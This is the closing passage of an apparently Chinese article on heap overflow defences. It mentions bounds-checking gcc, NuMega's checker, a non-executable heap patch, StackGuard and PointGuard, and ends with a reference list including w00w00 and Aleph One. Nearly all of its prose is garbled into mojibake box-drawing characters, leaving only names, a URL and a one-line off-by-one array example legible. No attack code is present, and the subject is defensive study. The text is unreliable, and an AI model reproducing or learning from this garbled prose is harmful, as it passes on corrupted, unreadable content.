- 5.0╡─mapped_path┬⌐╢┤╛═╩╟╥╗╕÷heap╥τ│÷(longjmp/setjmp)╡─╨┬└²╫╙,╙╨╨╦╚ñ╡─┐╔╥╘╫╘╝║
- ┐┤╥╗╧┬íú
-
- ╦─. ┐╔─▄╡─╜Γ╛÷╖╜╖¿
- ~~~~~~~~~~~~~~~~~~
- ║▄├≈╧╘,╖└╓╣╗∙╙┌heap╡─╥τ│÷╡─╫ε╝╤╖╜╖¿╛═╩╟▒α╨┤╙┼╨π╡─┤·┬δ!═¼╢╤╒╗╥τ│÷╥╗╤∙,▓ó├╗╙╨╥╗
- ╓╓╖╜╖¿─▄╒µ╒²╖└╓╣heap╥τ│÷.
- ╬╥├╟┐╔╥╘╩╣╙├Richard Jones║═Paul
- Kelly┐¬╖ó╡─┤°▒▀╜τ╝∞▓Θ╡─gcc/egcs(╦ⁿ╙ª╕├┐╔╥╘╝∞▓Θ
- ┤≤▓┐╖╓╡─╟▒╘┌╡─╥τ│÷╬╩╠Γ).╒Γ╕÷│╠╨≥┐╔╥╘┤╙Richard Jone╡─╓≈╥│╔╧╧┬╘╪:
- http://www.annexia.demon.co.uk
- ╦ⁿ─▄╝∞▓Θ┤≤╢α╩²╙╔╙┌╚╦╬¬╡─╩Φ║÷╢°╡╝╓┬╡─╥τ│÷.└²╚τ:
- "int array[10];
- for (i = 0; i <= 10; i++) array[i] = 1".
-
- ╫ó╥Γ:
- ╢╘╙┌Windows╧╡═│,┐╔╥╘╙├NuMega╡─▒▀╜τ╝∞▓Θ│╠╨≥.╦ⁿ╡─╣ª─▄║═┤°▒▀╜τ╝∞▓Θ╡─gcc
- └α╦╞.
-
- ╬╥├╟╫▄╩╟┐╔╥╘╫÷╥╗╕÷▓╗┐╔╓┤╨╨heap╡─patch(╛═╧δ╟░├µ╦∙╠ß╡╜╡─,┤≤╢α╩²╧╡═│╢╝╙╨╥╗╕÷┐╔╓┤╨╨
- ╡─heap).╘┌║═Solar
- Designer╜╗╗╗╥Γ╝√╥╘║≤,╦√╠ß╡╜▓╗┐╔╓┤╨╨heap╡─╓≈╥¬╬╩╠Γ╩╟┐╔─▄╗ß╙░╧∞
- ╡╜▒α╥δ╞≈,╜Γ╩═╞≈╡╚╡╚
-
- ╫ó╥Γ:
-
-
- ╝┤╩╣╥╗╕÷heap▓╗┐╔╓┤╨╨,╥▓▓ó▓╗─▄╜Γ╛÷╥τ│÷╡─╬╩╠Γ.╥≥╬¬╛í╣▄╬╥├╟▓╗─▄╘┌heap╓┤╨╨╓╕┴ε.
- ╬╥├╟╚╘╚╗┐╔╥╘╕▓╕╟╘┌heap╓╨╡─╩²╛▌.(╛═╧≤╟░├µminicom╡─└²╫╙)
-
- ┴φ╥╗╕÷┐╔─▄╡─╖╜╖¿╛═╩╟╫÷╥╗╕÷"HeapGuard",└α╦╞Crispin
- Cowan╡─StackGuard.╦√├╟╥╤╛¡┐¬
- ╖ó┴╦╥╗╕÷╨┬╡─PointGuard,╙├└┤╖└╓╣║»╩²╓╕╒δ╡─╥τ│÷╥╘╝░jmpbuf╡─╥τ│÷,╛▌│╞╛¡╣²┼Σ╓├╥▓┐╔
- ╥╘╖└╓╣stack/heap/bss╓╨▒Σ┴┐╡─╖╟╖¿╕▓╕╟.╧Ω╧╕╫╩┴╧┐╔╥╘▓╬┐┤╦√├╟╨┬╖ó▒φ╡─╬─╒┬:
- <<Buffer Overflows: Attacks and Defenses for the Vulnerability of the
- Decade>>
-
- <═Ω>
-
-
- ▓╬┐╝╬─╧╫:
-
- [1] <<w00w00 on Heap Overflows>> by Matt Conover (a.k.a. Shok) & w00w00
- Security Team
- [2] <<Buffer Overflows: Attacks and Defenses for the Vulnerability of the
- Decade>>
- by Crispin Cowan, Perry Wagle, Calton Pu,Steve Beattie, and Jonathan
- Walpole
- [3] <<a fuqn awesome minicom static buffer overflow>>. "ohday" . B4B0,3(9)
- [4] <<Smashing The Stack For Fun And Profit>>. "Aleph One". Phrack, 7(49)
-
-
-